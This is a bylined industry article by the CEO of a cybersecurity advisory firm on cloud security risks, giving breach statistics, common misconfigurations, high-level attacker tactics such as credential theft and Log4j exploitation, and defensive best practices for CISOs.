By Joseph Saracino, President and Chief Executive Officer at Cino Security Solutions
The use of cloud systems has been steadily growing, and for good reason. They offer many advantages, including ease of deployment, agility, scalability, and cost-effectiveness. They are not, however, without risks. In fact, the very features that make them popular with organizations, also make them prime targets for cybercriminals. Further, the proliferation of hybrid and multi-cloud environments has only enhanced their vulnerability to cyber-attacks. According to the CrowdStrike 2022 Global Threat Report, ransomware data leaks on cloud systems increased by 82%, and interactive intrusion campaigns increased by 42% from 2020 to 2021. Understanding the current cyber market as it relates to cloud systems, the risks associated with them, and how cybercriminals are exploiting them, as well as what measures should be taken to mitigate these risks, is critical for all Chief Information Security Officers (CISOs) and Information Technology (IT) professionals, especially for those serving in cloud-centric organizations.
Cybersecurity and the Cloud
Data presented in the Markets & Markets Report Cloud Security Market Size (2022-2026) projects that the global cloud security market size will grow from USD 40.8 billion in 2021 to USD 77.5 billion by 2026 at a Compound Annual Growth Rate (CAGR) of 13.7% from 2021 to 2026. That projection is consistent with the steady rise in cloud system adoption. OTAVA reported that in 2021, 87% of enterprises had already adopted hybrid cloud strategies in order to combine the public cloud with the security of a private, on-premises cloud environment. The Flexera 2020 State of the Cloud Report stated that 93% of enterprises were using a multi-cloud strategy. Along with the growth in cloud, deployments has been the rise in cyber-attacks against them. A 2021 IDC Survey of 200 CISOs found that 98% had experienced at least one cloud data breach in the past 18 months versus 79% in 2020. Further, the survey reported that 67% of them had three or more breaches, and 63% had sensitive data exposed. That’s not surprising given the many vulnerabilities associated cloud systems.
What Makes Cloud Systems Vulnerable?
Cloud systems were vulnerable before the pandemic, but it has made them even more at risk. The rise in remote working and use of more home-based devices, additional use of cloud collaboration tools (e.g., Cisco and WebEx), and the increase in video-conferencing (e.g., Microsoft Team and Zoom) have increased cloud systems’ cyber risks. The inherent complexities of cloud computing solutions and models (e.g., Software as a Service, Infrastructure as a Service, etc.) make it challenging to identify unknown threats in the cloud infrastructure. There are also protocol and procedural shortcomings that prevail in many organizations using the cloud. Among them are:
- Failing to maintain older cloud infrastructure scheduled for retirement with security configuration updates and removing sensitive data from these systems
- Failing to deploy multi-factor authentication (MFA)and disabling legacy authentication protocols that don’t support MFA
- Failing to establish sufficient identity, credential, access, and key management, including impersonation privileges, passwords, and certificate-based credentials for users and cloud service managers
- Failing to have a strong cloud security posture management solution that keeps detailed logs and provides alerts to both cloud security and operations staff
Additionally, many cloud platforms are not set up and configured properly. High on the list of features that make cloud systems prone to cyber-attacks are:
- Its granular access control which makes it difficult for individuals to understand, manage and secure the countless elements (i.e., hundreds of workloads, devices, credentials, etc.)
- Misconfigured cloud platforms and misconfigured identity and access management– Misconfigurations errors can be multiplied many times over and across many systems due to the cloud system’s scalability feature
- Its shared-responsibility model (i.e., security responsibility shared with organization and cloud security vendors) making oversight and remediation of errors poorly managed
- Lack of visibility into what data is within which cloud applications and these applications being provisioned in a way such that they are invisible to IT staff
These and other vulnerabilities have made it easy for cybercriminals to penetrate a cloud system.
How Cyber Criminals Attack the Cloud
Cybercriminals have many tactics for attacking a cloud system. They range from exploiting remote code execution (RCE) vulnerabilities in server software to stealing credentials, deploying credential-based intrusions, and then accessing victims’ accounts, cloud-hosted email, or file-hosting services.
Another avenue for their attacks is organizations’ cloud service providers (CSPs). By gaining and then abusing the trust of a CSP, cybercriminals can gain access to an organization’s enterprise authentication resources being hosted on the cloud, and potentially gain privileges that facilitate their ability to attack multiple cloud tenants of a single CSP. They can further wreak havoc by delivering malware to cloud hosting services by bypassing signature-based detections. By injecting malicious codes via access to an enterprise’s web applications, the cybercriminals can obtain financial information from those using the site, which, in turn, can cause significant liabilities, regulatory penalties, reputational damage, and potential loss of customers.
Cybercriminals also take advantage of misconfigured Docker containers and vulnerabilities in the cloud infrastructure’s layered software. These exploits enable them to move easily across a cloud service platform, evading security monitoring tools. Another attack vector utilized by cyber criminals includes using near-zero-day tools likeLog4j logging package for Java to access cloud platform metadata to target CSP credentials.
While most sophisticated cyber security professionals will say that it’s not a matter of if, but when an organization will experience a cyber-attack, it is vital that those with cloud systems adopt measures to help minimize their risks. The following are among the best practices to implement:
- Gain up-to-date cyber threat intelligence and share it with your staff, board members, and any vendors with access to your cloud and IT infrastructure (e.g., CSPs, managed service providers, maintenance firms, etc.). Take measures against any new threats.
- Adopt best practices (i.e., identity and access management, key management, etc.) in cyber security, including staff education and training on common cyber-attacks.
- Design cloud deployments with threat mitigation in mind from the beginning by making certain to secure key areas (i.e., workloads, containers, applications, file storage) against potential criminal exploitation.
- Deploy cyber security solutions that provide automated detection and remediation, and vulnerability management. Next-generation endpoint protection for servers, workstations, and mobile devices is critical. In doing so, strive to reduce the number of tools being used for IT analysis, while delivering visibility of the cloud’s operations.
- Correct any and all configuration errors. Apply technologies that continuously scan for misconfigurations to promote real-time remediations. If necessary, establish a new cloud infrastructure with defaults that facilitate the easy adoption of secure operations. Create new sub-accounts and subscriptions in an intuitive way to reduce common human errors.
- Apply a Cloud Solution Posture Management (CSPM) tool that keeps cloud operations, and security teams alerted to potential vulnerabilities. To support this tactic, decommission and shadow IT could environments or manage them.
For all their advantages, cloud systems and their vulnerability to cyber-attacks demand a strategic and tactical approach. Technologies alone nor are best practices enough. There needs to be a holistic approach that starts by prioritizing cloud security and engages an entire organization and its relevant vendors. By understanding the risks and threat vectors, and deploying a comprehensive strategy, cloud-centric organizations can establish a strong risk mitigation position.
Joseph Saracino is the president and chief executive officer of Cino Security Solutions (https://www.cinoltd.com), a trusted advisory firm on cybersecurity for organizations across diverse industries. Saracino leverages his extensive experience as a former Military Intelligence Commander to lead Cino’s cyber security operations. He also serves as a consultant to the U.S. Department of Homeland Security, Joint Military Task Force Commands, and is an active member of the Suffolk County Police Department’s SHIELD, a Counter-Terrorism and Anti-Crime program in partnership with the New York Police Department and law enforcement agencies across the nation. You can reach him at: email@example.com.